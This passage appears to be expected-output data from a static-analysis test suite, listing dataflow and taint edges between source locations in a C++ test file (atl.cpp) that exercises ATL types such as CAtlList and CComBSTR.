atl.cpp:295:11:295:21 | call to source | atl.cpp:316:29:316:29 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:322:21:322:21 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:330:30:330:30 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:337:31:337:31 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:342:44:342:44 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:351:18:351:18 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:359:19:359:19 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:368:29:368:29 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:374:21:374:21 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:382:30:382:30 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:389:31:389:31 | x | | -| atl.cpp:295:11:295:21 | call to source | atl.cpp:394:44:394:44 | x | | -| atl.cpp:297:24:297:25 | 10 | atl.cpp:297:24:297:26 | call to CAtlList | TAINT | -| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:298:10:298:13 | list | | -| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:299:5:299:8 | list | | -| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:300:10:300:13 | list | | -| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:303:24:303:27 | list | | -| atl.cpp:297:24:297:26 | call to CAtlList | atl.cpp:345:3:345:3 | list | | -| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:299:5:299:8 | list | | -| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:300:10:300:13 | list | | -| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:303:24:303:27 | list | | -| atl.cpp:298:10:298:13 | ref arg list | atl.cpp:345:3:345:3 | list | | -| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:300:10:300:13 | list | | -| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:303:24:303:27 | list | | -| atl.cpp:299:5:299:8 | ref arg list | atl.cpp:345:3:345:3 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:303:24:303:27 | list | | -| atl.cpp:300:10:300:13 | ref arg list | atl.cpp:345:3:345:3 | list | | -| atl.cpp:302:25:302:26 | 10 | atl.cpp:302:25:302:27 | call to CAtlList | TAINT | -| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:303:5:303:9 | list2 | | -| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:304:10:304:14 | list2 | | -| atl.cpp:302:25:302:27 | call to CAtlList | atl.cpp:345:3:345:3 | list2 | | -| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:304:10:304:14 | list2 | | -| atl.cpp:303:5:303:9 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | -| atl.cpp:303:24:303:27 | list | atl.cpp:303:23:303:27 | & ... | | -| atl.cpp:304:10:304:14 | ref arg list2 | atl.cpp:345:3:345:3 | list2 | | -| atl.cpp:306:25:306:26 | 10 | atl.cpp:306:25:306:27 | call to CAtlList | TAINT | -| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:307:5:307:9 | list3 | | -| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:308:10:308:14 | list3 | | -| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:311:24:311:28 | list3 | | -| atl.cpp:306:25:306:27 | call to CAtlList | atl.cpp:345:3:345:3 | list3 | | -| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:308:10:308:14 | list3 | | -| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | -| atl.cpp:307:5:307:9 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | -| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:311:24:311:28 | list3 | | -| atl.cpp:308:10:308:14 | ref arg list3 | atl.cpp:345:3:345:3 | list3 | | -| atl.cpp:310:25:310:26 | 10 | atl.cpp:310:25:310:27 | call to CAtlList | TAINT | -| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:311:5:311:9 | list4 | | -| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:312:10:312:14 | list4 | | -| atl.cpp:310:25:310:27 | call to CAtlList | atl.cpp:345:3:345:3 | list4 | | -| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:312:10:312:14 | list4 | | -| atl.cpp:311:5:311:9 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | -| atl.cpp:311:24:311:28 | list3 | atl.cpp:311:23:311:28 | & ... | | -| atl.cpp:312:10:312:14 | ref arg list4 | atl.cpp:345:3:345:3 | list4 | | -| atl.cpp:315:27:315:28 | 10 | atl.cpp:315:27:315:29 | call to CAtlList | TAINT | -| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:18:316:22 | list5 | | -| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:316:32:316:36 | list5 | | -| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:317:12:317:16 | list5 | | -| atl.cpp:315:27:315:29 | call to CAtlList | atl.cpp:318:5:318:5 | list5 | | -| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | -| atl.cpp:316:18:316:22 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | -| atl.cpp:316:24:316:27 | call to Find | atl.cpp:317:24:317:26 | pos | | -| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:316:18:316:22 | list5 | | -| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:317:12:317:16 | list5 | | -| atl.cpp:316:32:316:36 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | -| atl.cpp:317:12:317:16 | ref arg list5 | atl.cpp:318:5:318:5 | list5 | | -| atl.cpp:321:27:321:28 | 10 | atl.cpp:321:27:321:29 | call to CAtlList | TAINT | -| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:322:7:322:11 | list6 | | -| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:323:18:323:22 | list6 | | -| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:324:12:324:16 | list6 | | -| atl.cpp:321:27:321:29 | call to CAtlList | atl.cpp:325:5:325:5 | list6 | | -| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:323:18:323:22 | list6 | | -| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | -| atl.cpp:322:7:322:11 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | -| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:324:12:324:16 | list6 | | -| atl.cpp:323:18:323:22 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | -| atl.cpp:323:24:323:32 | call to FindIndex | atl.cpp:324:24:324:26 | pos | | -| atl.cpp:324:12:324:16 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | -| atl.cpp:328:27:328:28 | 10 | atl.cpp:328:27:328:29 | call to CAtlList | TAINT | -| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:329:18:329:22 | list7 | | -| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:330:7:330:11 | list7 | | -| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:331:12:331:16 | list7 | | -| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:332:5:332:5 | list7 | | -| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:330:7:330:11 | list7 | | -| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | -| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | -| atl.cpp:329:24:329:38 | call to GetTailPosition | atl.cpp:330:25:330:27 | pos | | -| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | -| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | -| atl.cpp:331:12:331:16 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | -| atl.cpp:335:27:335:28 | 10 | atl.cpp:335:27:335:29 | call to CAtlList | TAINT | -| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:336:18:336:22 | list8 | | -| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:337:7:337:11 | list8 | | -| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:338:12:338:16 | list8 | | -| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:339:5:339:5 | list8 | | -| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:337:7:337:11 | list8 | | -| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | -| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | -| atl.cpp:336:24:336:38 | call to GetTailPosition | atl.cpp:337:26:337:28 | pos | | -| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | -| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | -| atl.cpp:338:12:338:16 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | -| atl.cpp:341:27:341:28 | 10 | atl.cpp:341:27:341:29 | call to CAtlList | TAINT | -| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:7:342:11 | list9 | | -| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:19:342:23 | list9 | | -| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:343:12:343:16 | list9 | | -| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:344:5:344:5 | list9 | | -| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | -| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | -| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:342:7:342:11 | list9 | | -| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | -| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | -| atl.cpp:343:12:343:16 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | -| atl.cpp:349:24:349:25 | 10 | atl.cpp:349:24:349:26 | call to CAtlList | TAINT | -| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:350:10:350:13 | list | | -| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:351:5:351:8 | list | | -| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:352:10:352:13 | list | | -| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:355:24:355:27 | list | | -| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:397:3:397:3 | list | | -| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:351:5:351:8 | list | | -| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:352:10:352:13 | list | | -| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:355:24:355:27 | list | | -| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:397:3:397:3 | list | | -| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:352:10:352:13 | list | | -| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:355:24:355:27 | list | | -| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:397:3:397:3 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:355:24:355:27 | list | | -| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:397:3:397:3 | list | | -| atl.cpp:354:25:354:26 | 10 | atl.cpp:354:25:354:27 | call to CAtlList | TAINT | -| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:355:5:355:9 | list2 | | -| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:356:10:356:14 | list2 | | -| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:397:3:397:3 | list2 | | -| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:356:10:356:14 | list2 | | -| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | -| atl.cpp:355:24:355:27 | list | atl.cpp:355:23:355:27 | & ... | | -| atl.cpp:356:10:356:14 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | -| atl.cpp:358:25:358:26 | 10 | atl.cpp:358:25:358:27 | call to CAtlList | TAINT | -| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:359:5:359:9 | list3 | | -| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:360:10:360:14 | list3 | | -| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:363:24:363:28 | list3 | | -| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:397:3:397:3 | list3 | | -| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:360:10:360:14 | list3 | | -| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | -| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | -| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | -| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | -| atl.cpp:362:25:362:26 | 10 | atl.cpp:362:25:362:27 | call to CAtlList | TAINT | -| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:363:5:363:9 | list4 | | -| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:364:10:364:14 | list4 | | -| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:397:3:397:3 | list4 | | -| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:364:10:364:14 | list4 | | -| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | -| atl.cpp:363:24:363:28 | list3 | atl.cpp:363:23:363:28 | & ... | | -| atl.cpp:364:10:364:14 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | -| atl.cpp:367:27:367:28 | 10 | atl.cpp:367:27:367:29 | call to CAtlList | TAINT | -| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:18:368:22 | list5 | | -| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:32:368:36 | list5 | | -| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:369:12:369:16 | list5 | | -| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:370:5:370:5 | list5 | | -| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | -| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | -| atl.cpp:368:24:368:27 | call to Find | atl.cpp:369:24:369:26 | pos | | -| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:368:18:368:22 | list5 | | -| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | -| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | -| atl.cpp:369:12:369:16 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | -| atl.cpp:373:27:373:28 | 10 | atl.cpp:373:27:373:29 | call to CAtlList | TAINT | -| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:374:7:374:11 | list6 | | -| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:375:18:375:22 | list6 | | -| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:376:12:376:16 | list6 | | -| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:377:5:377:5 | list6 | | -| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:375:18:375:22 | list6 | | -| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | -| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | -| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | -| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | -| atl.cpp:375:24:375:32 | call to FindIndex | atl.cpp:376:24:376:26 | pos | | -| atl.cpp:376:12:376:16 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | -| atl.cpp:380:27:380:28 | 10 | atl.cpp:380:27:380:29 | call to CAtlList | TAINT | -| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:381:18:381:22 | list7 | | -| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:382:7:382:11 | list7 | | -| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:383:12:383:16 | list7 | | -| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:384:5:384:5 | list7 | | -| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:382:7:382:11 | list7 | | -| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | -| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | -| atl.cpp:381:24:381:38 | call to GetTailPosition | atl.cpp:382:25:382:27 | pos | | -| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | -| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | -| atl.cpp:383:12:383:16 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | -| atl.cpp:387:27:387:28 | 10 | atl.cpp:387:27:387:29 | call to CAtlList | TAINT | -| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:388:18:388:22 | list8 | | -| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:389:7:389:11 | list8 | | -| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:390:12:390:16 | list8 | | -| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:391:5:391:5 | list8 | | -| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:389:7:389:11 | list8 | | -| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:390:12:390:16 | list8 | | -| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | -| atl.cpp:388:24:388:38 | call to GetTailPosition | atl.cpp:389:26:389:28 | pos | | -| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:390:12:390:16 | list8 | | -| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | -| atl.cpp:390:12:390:16 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | -| atl.cpp:393:27:393:28 | 10 | atl.cpp:393:27:393:29 | call to CAtlList | TAINT | -| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:7:394:11 | list9 | | -| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:19:394:23 | list9 | | -| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:395:12:395:16 | list9 | | -| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:396:5:396:5 | list9 | | -| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | -| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | -| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:394:7:394:11 | list9 | | -| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | -| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | -| atl.cpp:395:12:395:16 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | -| atl.cpp:453:21:453:33 | new | atl.cpp:454:3:454:6 | safe | | -| atl.cpp:453:21:453:33 | new | atl.cpp:455:10:455:13 | safe | | -| atl.cpp:454:3:454:6 | safe [post update] | atl.cpp:455:10:455:13 | safe | | -| atl.cpp:454:3:454:40 | ... = ... | atl.cpp:454:9:454:14 | pvData [post update] | | -| atl.cpp:454:18:454:38 | call to indirect_source | atl.cpp:454:3:454:40 | ... = ... | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:461:16:461:16 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:468:20:468:20 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:472:16:472:16 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:480:11:480:11 | x | | -| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:494:20:494:20 | x | | -| atl.cpp:461:16:461:16 | x | atl.cpp:461:16:461:17 | call to CComBSTR | TAINT | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:462:10:462:10 | b | | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:464:17:464:17 | b | | -| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:466:3:466:3 | b | | -| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:464:17:464:17 | b | | -| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:466:3:466:3 | b | | -| atl.cpp:462:12:462:16 | ref arg m_str | atl.cpp:465:13:465:17 | m_str | | -| atl.cpp:464:17:464:17 | b | atl.cpp:464:17:464:18 | call to CComBSTR | | -| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:465:10:465:11 | b2 | | -| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:466:3:466:3 | b2 | | -| atl.cpp:465:10:465:11 | b2 [post update] | atl.cpp:466:3:466:3 | b2 | | -| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:469:10:469:10 | b | | -| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:470:3:470:3 | b | | -| atl.cpp:469:10:469:10 | b [post update] | atl.cpp:470:3:470:3 | b | | -| atl.cpp:472:16:472:16 | x | atl.cpp:472:16:472:17 | call to CComBSTR | TAINT | -| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:476:11:476:11 | b | | -| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:512:3:512:3 | b | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:475:10:475:11 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:476:5:476:6 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:476:5:476:6 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:475:13:475:17 | ref arg m_str | atl.cpp:477:13:477:17 | m_str | | -| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:477:10:477:11 | b2 | | -| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:480:5:480:6 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:481:10:481:11 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:481:10:481:11 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:480:11:480:11 | x | atl.cpp:480:11:480:11 | call to CComBSTR | TAINT | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:482:28:482:29 | b3 | | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | -| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:483:11:483:14 | * ... | atl.cpp:483:10:483:14 | * ... | TAINT | -| atl.cpp:483:12:483:12 | call to operator& | atl.cpp:483:11:483:14 | * ... | TAINT | -| atl.cpp:483:13:483:14 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:486:5:486:6 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:487:10:487:11 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:487:10:487:11 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:490:19:490:20 | b4 | | -| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:487:13:487:17 | ref arg m_str | atl.cpp:490:22:490:26 | m_str | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:490:5:490:6 | b5 | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:491:10:491:11 | b5 | | -| atl.cpp:489:14:489:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:491:10:491:11 | b5 | | -| atl.cpp:490:5:490:6 | ref arg b5 | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:490:19:490:20 | b4 [post update] | atl.cpp:512:3:512:3 | b4 | | -| atl.cpp:491:10:491:11 | b5 [post update] | atl.cpp:512:3:512:3 | b5 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:494:5:494:6 | b6 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:495:10:495:11 | b6 | | -| atl.cpp:493:14:493:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:495:10:495:11 | b6 | | -| atl.cpp:494:5:494:6 | ref arg b6 | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:495:10:495:11 | b6 [post update] | atl.cpp:512:3:512:3 | b6 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:498:5:498:6 | b7 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:499:10:499:11 | b7 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:502:19:502:20 | b7 | | -| atl.cpp:497:14:497:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:499:10:499:11 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:502:19:502:20 | b7 | | -| atl.cpp:498:5:498:6 | ref arg b7 | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:502:19:502:20 | b7 | | -| atl.cpp:499:10:499:11 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:499:13:499:17 | ref arg m_str | atl.cpp:502:22:502:26 | m_str | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:502:5:502:6 | b8 | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:503:10:503:11 | b8 | | -| atl.cpp:501:14:501:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:503:10:503:11 | b8 | | -| atl.cpp:502:5:502:6 | ref arg b8 | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:502:19:502:20 | b7 [post update] | atl.cpp:512:3:512:3 | b7 | | -| atl.cpp:503:10:503:11 | b8 [post update] | atl.cpp:512:3:512:3 | b8 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:507:5:507:6 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:508:5:508:6 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:505:14:505:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:506:15:506:18 | safe | atl.cpp:508:21:508:24 | safe | | -| atl.cpp:506:15:506:18 | safe | atl.cpp:509:10:509:13 | safe | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:508:5:508:6 | b9 | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:507:5:507:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:511:10:511:11 | b9 | | -| atl.cpp:508:5:508:6 | ref arg b9 | atl.cpp:512:3:512:3 | b9 | | -| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:508:21:508:24 | safe [inner post update] | | -| atl.cpp:508:20:508:24 | ref arg & ... | atl.cpp:509:10:509:13 | safe | | -| atl.cpp:508:21:508:24 | safe | atl.cpp:508:20:508:24 | & 